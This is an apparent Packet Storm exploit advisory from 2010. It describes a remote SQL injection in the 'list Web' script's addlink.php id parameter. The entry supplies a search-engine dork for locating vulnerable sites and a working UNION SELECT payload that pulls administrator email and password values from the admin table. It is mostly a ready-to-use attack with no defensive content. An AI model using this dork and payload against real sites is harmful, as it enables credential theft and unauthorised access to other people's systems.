List Web SQL Injection

2010-01-01T00:00:00
ID PACKETSTORM:84634
Type packetstorm
Reporter Hussin X
Modified 2010-01-01T00:00:00

Description

                                        
                                            `|  
| list Web (addlink.php id) Remote SQL Injection Vulnerability  
|  
|___________________________________________________  
|-------------------- Hussin X -------------------|  
|  
| Author: Hussin X  
|  
| Home : WwW.IQ-ty.CoM<http://WwW.IQ-ty.CoM>  
|  
| email: darkangel_g85[at]Yahoo[DoT]com  
|  
|___________________________________________________  
| |  
|  
| script : http://maker.ir  
|  
| DorK : inurl:"ir/addlink.php?id=" or inurl:"addlink.php?id="  
|___________________________________________________|  
  
Exploit:  
________  
  
  
www.[target].com/Script/addlink.php?id=-0+union+select+1,concat(email,0x3e,password),3,4+from+admin--  
  
IQ-SecuritY FoRuM  
  
`